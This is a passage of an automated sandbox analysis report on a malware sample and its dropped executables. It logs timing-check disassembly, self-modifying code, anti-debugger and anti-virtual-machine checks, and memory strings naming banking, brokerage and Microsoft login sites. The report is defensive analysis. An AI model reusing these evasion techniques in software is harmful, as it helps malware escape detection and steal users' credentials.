Source: C:\Users\user\AppData\Local\Temp\M0LIFBH5YXA7UY5T49ZOOBXLNF0YM.exe RDTSC instruction interceptor: First address: 259AF4 second address: 259B2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FB678E7E6E6h 0x0000000a pop esi 0x0000000b pushad 0x0000000c jmp 00007FB678E7E6F9h 0x00000011 jl 00007FB678E7E6E6h 0x00000017 jmp 00007FB678E7E6EDh 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\AppData\Local\Temp\M0LIFBH5YXA7UY5T49ZOOBXLNF0YM.exe RDTSC instruction interceptor: First address: 25C391 second address: 25C397 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\M0LIFBH5YXA7UY5T49ZOOBXLNF0YM.exe RDTSC instruction interceptor: First address: 25C397 second address: 25C39B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\M0LIFBH5YXA7UY5T49ZOOBXLNF0YM.exe RDTSC instruction interceptor: First address: 25C39B second address: 25C3D8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB6784C8BDBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007FB6784C8BE9h 0x00000011 mov eax, dword ptr [esp+04h] 0x00000015 jl 00007FB6784C8BE2h 0x0000001b jp 00007FB6784C8BDCh 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\AppData\Local\Temp\M0LIFBH5YXA7UY5T49ZOOBXLNF0YM.exe RDTSC instruction interceptor: First address: 25C4BD second address: 25C4C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\M0LIFBH5YXA7UY5T49ZOOBXLNF0YM.exe RDTSC instruction interceptor: First address: 25C4C2 second address: 25C556 instructions: 0x00000000 rdtsc 0x00000002 je 00007FB6784C8BD8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edi 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f jno 00007FB6784C8BD6h 0x00000015 popad 0x00000016 pop edi 0x00000017 nop 0x00000018 push 00000000h 0x0000001a push esi 0x0000001b call 00007FB6784C8BD8h 0x00000020 pop esi 0x00000021 mov dword ptr [esp+04h], esi 0x00000025 add dword ptr [esp+04h], 00000015h 0x0000002d inc esi 0x0000002e push esi 0x0000002f ret 0x00000030 pop esi 0x00000031 ret 0x00000032 mov edx, dword ptr [ebp+122D2D4Dh] 0x00000038 jmp 00007FB6784C8BE1h 0x0000003d push 00000000h 0x0000003f pushad 0x00000040 pushad 0x00000041 mov ecx, dword ptr [ebp+122D2DCDh] 0x00000047 mov edi, edx 0x00000049 popad 0x0000004a and edx, dword ptr [ebp+122D2FB9h] 0x00000050 popad 0x00000051 call 00007FB6784C8BD9h 0x00000056 pushad 0x00000057 push edi 0x00000058 jmp 00007FB6784C8BDBh 0x0000005d pop edi 0x0000005e jmp 00007FB6784C8BE4h 0x00000063 popad 0x00000064 push eax 0x00000065 push eax 0x00000066 push edx 0x00000067 pushad 0x00000068 push eax 0x00000069 push edx 0x0000006a rdtsc
Source: C:\Users\user\AppData\Local\Temp\M0LIFBH5YXA7UY5T49ZOOBXLNF0YM.exe RDTSC instruction interceptor: First address: 25C556 second address: 25C55D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 16ED8E instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 314027 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 321F0A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\M0LIFBH5YXA7UY5T49ZOOBXLNF0YM.exe Special instruction interceptor: First address: CDDA7 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\M0LIFBH5YXA7UY5T49ZOOBXLNF0YM.exe Special instruction interceptor: First address: CDE9F instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\M0LIFBH5YXA7UY5T49ZOOBXLNF0YM.exe Special instruction interceptor: First address: 28124F instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\M0LIFBH5YXA7UY5T49ZOOBXLNF0YM.exe Special instruction interceptor: First address: 27FC05 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\M0LIFBH5YXA7UY5T49ZOOBXLNF0YM.exe Special instruction interceptor: First address: 3215EA instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\4XW8W5G3AUTSGA2M5UZH7L9.exe Special instruction interceptor: First address: 2FEA24 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\4XW8W5G3AUTSGA2M5UZH7L9.exe Special instruction interceptor: First address: 4A6771 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\4XW8W5G3AUTSGA2M5UZH7L9.exe Special instruction interceptor: First address: 4D0BD0 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\4XW8W5G3AUTSGA2M5UZH7L9.exe Special instruction interceptor: First address: 4B8AF2 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 48EA24 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 636771 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 660BD0 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 648AF2 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Special instruction interceptor: First address: 45ED8E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Special instruction interceptor: First address: 604027 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Special instruction interceptor: First address: 611F0A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1002597001\76bf5a4dba.exe Special instruction interceptor: First address: 60D89B instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1002597001\76bf5a4dba.exe Special instruction interceptor: First address: 7B4486 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1002597001\76bf5a4dba.exe Special instruction interceptor: First address: 7DDD6D instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1002597001\76bf5a4dba.exe Special instruction interceptor: First address: 7BD52B instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\M0LIFBH5YXA7UY5T49ZOOBXLNF0YM.exe Memory allocated: 4B90000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\M0LIFBH5YXA7UY5T49ZOOBXLNF0YM.exe Memory allocated: 4DB0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\M0LIFBH5YXA7UY5T49ZOOBXLNF0YM.exe Memory allocated: 6DB0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002597001\76bf5a4dba.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\1002597001\76bf5a4dba.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\1002597001\76bf5a4dba.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\AppData\Local\Temp\M0LIFBH5YXA7UY5T49ZOOBXLNF0YM.exe Code function: 10_2_0025C6A2 rdtsc 10_2_0025C6A2
Source: C:\Users\user\AppData\Local\Temp\M0LIFBH5YXA7UY5T49ZOOBXLNF0YM.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 180000 Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7244 Thread sleep time: -240000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7256 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\M0LIFBH5YXA7UY5T49ZOOBXLNF0YM.exe TID: 7716 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 1272 Thread sleep time: -42021s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 1156 Thread sleep count: 177 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 1156 Thread sleep time: -5310000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 1316 Thread sleep time: -34017s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3824 Thread sleep time: -40020s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3672 Thread sleep time: -30015s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2044 Thread sleep time: -180000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 1156 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe TID: 5532 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe TID: 6312 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\Desktop\file.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\4XW8W5G3AUTSGA2M5UZH7L9.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\M0LIFBH5YXA7UY5T49ZOOBXLNF0YM.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 30000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 180000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 30000 Jump to behavior
Source: skotes.exe, skotes.exe, 00000011.00000002.2514013755.0000000000618000.00000040.00000001.01000000.0000000C.sdmp, 100bc97ff1.exe, 00000013.00000000.2199408785.00000000005E1000.00000080.00000001.01000000.0000000E.sdmp, 100bc97ff1.exe, 00000013.00000002.2517338010.00000000005E2000.00000040.00000001.01000000.0000000E.sdmp, 100bc97ff1.exe, 00000013.00000003.2223886198.0000000004DAA000.00000004.00000800.00020000.00000000.sdmp, 76bf5a4dba.exe, 00000014.00000002.2348946606.0000000000795000.00000040.00000001.01000000.0000000F.sdmp, 100bc97ff1.exe, 00000015.00000000.2336456270.00000000005E1000.00000080.00000001.01000000.0000000E.sdmp, 100bc97ff1.exe, 00000015.00000002.2518171412.00000000005E2000.00000040.00000001.01000000.0000000E.sdmp, 100bc97ff1.exe, 00000015.00000003.2362365884.000000000545E000.00000004.00000800.00020000.00000000.sdmp, 76bf5a4dba.exe, 00000028.00000002.2514742525.0000000000795000.00000040.00000001.01000000.0000000F.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: firefox.exe, 00000024.00000002.2597900351.000001DF10B2C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWMA%SystemRoot%\system32\mswsock.dllILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userwindir=C:\Windows
Source: 100bc97ff1.exe, 00000015.00000003.2418516998.0000000005C48000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
Source: 100bc97ff1.exe, 00000015.00000003.2418516998.0000000005C48000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
Source: 100bc97ff1.exe, 00000015.00000003.2418516998.0000000005C48000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696492231}
Source: 100bc97ff1.exe, 00000015.00000003.2418516998.0000000005C48000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.co.inVMware20,11696492231d
Source: skotes.exe, 00000011.00000002.2525644664.0000000000DDB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWr.
Source: 100bc97ff1.exe, 00000015.00000003.2418516998.0000000005C48000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: netportal.hdfcbank.comVMware20,11696492231
Source: 100bc97ff1.exe, 00000015.00000003.2418516998.0000000005C48000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696492231s
Source: 100bc97ff1.exe, 00000015.00000003.2418516998.0000000005C48000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
Source: 100bc97ff1.exe, 00000015.00000003.2418516998.0000000005C48000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696492231
Source: 100bc97ff1.exe, 00000015.00000003.2418516998.0000000005C48000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.comVMware20,11696492231
Source: 100bc97ff1.exe, 00000015.00000003.2418516998.0000000005C48000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: microsoft.visualstudio.comVMware20,11696492231x
Source: skotes.exe, 00000011.00000002.2525644664.0000000000DDB000.00000004.00000020.00020000.00000000.sdmp, 100bc97ff1.exe, 00000013.00000003.2329931380.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, 100bc97ff1.exe, 00000013.00000002.2537758267.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, 100bc97ff1.exe, 00000013.00000003.2252846404.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, 100bc97ff1.exe, 00000013.00000003.2357604902.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, 100bc97ff1.exe, 00000013.00000003.2284782172.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, 100bc97ff1.exe, 00000013.00000003.2269828204.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, 100bc97ff1.exe, 00000013.00000003.2304213166.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, 100bc97ff1.exe, 00000013.00000003.2503770138.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, 100bc97ff1.exe, 00000013.00000003.2325695916.0000000000D94000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: firefox.exe, 00000024.00000002.2796802534.000001DF1A7BF000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW : 2 : 34 : 1 : 1 : 0x20026 : 0x8 : %SystemRoot%\system32\mswsock.dll : : 1234191b-4bf7-4ca7-86e0-dfd7c32b5445
Source: 100bc97ff1.exe, 00000015.00000003.2418516998.0000000005C48000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
Source: 100bc97ff1.exe, 00000015.00000003.2418516998.0000000005C48000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
Source: 100bc97ff1.exe, 00000015.00000003.2418516998.0000000005C48000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Test URL for global passwords blocklistVMware20,11696492231
Source: 100bc97ff1.exe, 00000015.00000003.2418516998.0000000005C48000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office365.comVMware20,11696492231t
Source: firefox.exe, 00000024.00000002.2597900351.000001DF10B2C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll^
Source: 100bc97ff1.exe, 00000015.00000003.2418516998.0000000005C4D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: - GDCDYNVMware20,11696492231p
Source: 100bc97ff1.exe, 00000015.00000003.2418516998.0000000005C48000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
Source: 100bc97ff1.exe, 00000015.00000003.2418516998.0000000005C48000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,11696492231f
Source: firefox.exe, 00000024.00000002.2597900351.000001DF10B2C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}~
Source: 100bc97ff1.exe, 00000015.00000003.2418516998.0000000005C48000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: global block list test formVMware20,11696492231
Source: 100bc97ff1.exe, 00000015.00000003.2418516998.0000000005C48000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: dev.azure.comVMware20,11696492231j
Source: 100bc97ff1.exe, 00000015.00000003.2418516998.0000000005C48000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.comVMware20,11696492231}
Source: 100bc97ff1.exe, 00000015.00000003.2418516998.0000000005C48000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
Source: 100bc97ff1.exe, 00000015.00000003.2418516998.0000000005C48000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,11696492231x
Source: 100bc97ff1.exe, 00000015.00000003.2418516998.0000000005C48000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,11696492231h
Source: 100bc97ff1.exe, 00000015.00000003.2418516998.0000000005C48000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: tasks.office.comVMware20,11696492231o
Source: 100bc97ff1.exe, 00000015.00000002.2534637202.0000000001346000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWq
Source: 76bf5a4dba.exe, 00000014.00000002.2351036059.0000000000F9E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: 100bc97ff1.exe, 00000015.00000003.2418516998.0000000005C48000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: account.microsoft.com/profileVMware20,11696492231u
Source: 100bc97ff1.exe, 00000015.00000003.2418516998.0000000005C48000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231
Source: 100bc97ff1.exe, 00000015.00000003.2418516998.0000000005C48000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
Source: 100bc97ff1.exe, 00000015.00000003.2418516998.0000000005C48000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,11696492231
Source: file.exe, 00000000.00000000.1254526769.00000000002F1000.00000080.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.1283807608.0000000004FC3000.00000004.00000800.00020000.00000000.sdmp, M0LIFBH5YXA7UY5T49ZOOBXLNF0YM.exe, 0000000A.00000002.1667815433.0000000000261000.00000040.00000001.01000000.00000006.sdmp, 4XW8W5G3AUTSGA2M5UZH7L9.exe, 0000000B.00000002.1593731154.0000000000488000.00000040.00000001.01000000.00000009.sdmp, skotes.exe, 0000000C.00000002.1621988683.0000000000618000.00000040.00000001.01000000.0000000C.sdmp, skotes.exe, 0000000D.00000002.1625119302.0000000000618000.00000040.00000001.01000000.0000000C.sdmp, skotes.exe, 00000011.00000002.2514013755.0000000000618000.00000040.00000001.01000000.0000000C.sdmp, 100bc97ff1.exe, 00000013.00000000.2199408785.00000000005E1000.00000080.00000001.01000000.0000000E.sdmp, 100bc97ff1.exe, 00000013.00000002.2517338010.00000000005E2000.00000040.00000001.01000000.0000000E.sdmp, 100bc97ff1.exe, 00000013.00000003.2223886198.0000000004DAA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: skotes.exe, 00000011.00000002.2525644664.0000000000DA7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW@
Source: 100bc97ff1.exe, 00000015.00000003.2418516998.0000000005C48000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: turbotax.intuit.comVMware20,11696492231t
Source: 100bc97ff1.exe, 00000015.00000003.2418516998.0000000005C48000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
Source: 100bc97ff1.exe, 00000015.00000003.2418516998.0000000005C48000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696492231x
Source: 100bc97ff1.exe, 00000015.00000003.2418516998.0000000005C48000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - HKVMware20,11696492231]
Source: C:\Users\user\Desktop\file.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging

barindex
Source: C:\Users\user\Desktop\file.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\M0LIFBH5YXA7UY5T49ZOOBXLNF0YM.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4XW8W5G3AUTSGA2M5UZH7L9.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1002597001\76bf5a4dba.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1002597001\76bf5a4dba.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\M0LIFBH5YXA7UY5T49ZOOBXLNF0YM.exe Code function: 10_2_0025C807 Start: 0025C89A End: 0025C82E 10_2_0025C807
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 17_2_04BB08D7 Start: 04BB08EA End: 04BB08F0 17_2_04BB08D7
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 17_2_04BB0949 Start: 04BB08EA End: 04BB08F0 17_2_04BB0949
Source: C:\Users\user\AppData\Local\Temp\1002597001\76bf5a4dba.exe Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\1002597001\76bf5a4dba.exe Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\1002597001\76bf5a4dba.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1002597001\76bf5a4dba.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\1002597001\76bf5a4dba.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1002597001\76bf5a4dba.exe Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\1002597001\76bf5a4dba.exe Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\1002597001\76bf5a4dba.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1002597001\76bf5a4dba.exe File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\1002597001\76bf5a4dba.exe File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\1002597001\76bf5a4dba.exe File opened: SIWVID
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\M0LIFBH5YXA7UY5T49ZOOBXLNF0YM.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\M0LIFBH5YXA7UY5T49ZOOBXLNF0YM.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\M0LIFBH5YXA7UY5T49ZOOBXLNF0YM.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4XW8W5G3AUTSGA2M5UZH7L9.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4XW8W5G3AUTSGA2M5UZH7L9.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4XW8W5G3AUTSGA2M5UZH7L9.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1002597001\76bf5a4dba.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1002597001\76bf5a4dba.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1002597001\76bf5a4dba.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1002597001\76bf5a4dba.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1002597001\76bf5a4dba.exe Process queried: DebugPort
